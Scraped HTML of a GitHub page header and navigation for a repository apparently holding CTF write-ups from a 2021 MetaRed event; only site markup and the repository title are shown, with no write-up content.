<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="439026600" data-scoped-search-url="/uac-ctf/MetaRed2021-5th-Writeups/search" data-owner-scoped-search-url="/orgs/uac-ctf/search" data-unscoped-search-url="/search" data-turbo="false" action="/uac-ctf/MetaRed2021-5th-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="lxPO8HH/mhInMfqUgr3v6V+LujoRnVnbrOjobpS0ES4uS7SUY0iOLaiP6vJm8h5o9TE3hQ8Qogj6WTPB1GYT2Q==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this organization </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> uac-ctf </span> <span>/</span> MetaRed2021-5th-Writeups
<span></span><span>Public</span> </div>
</div>
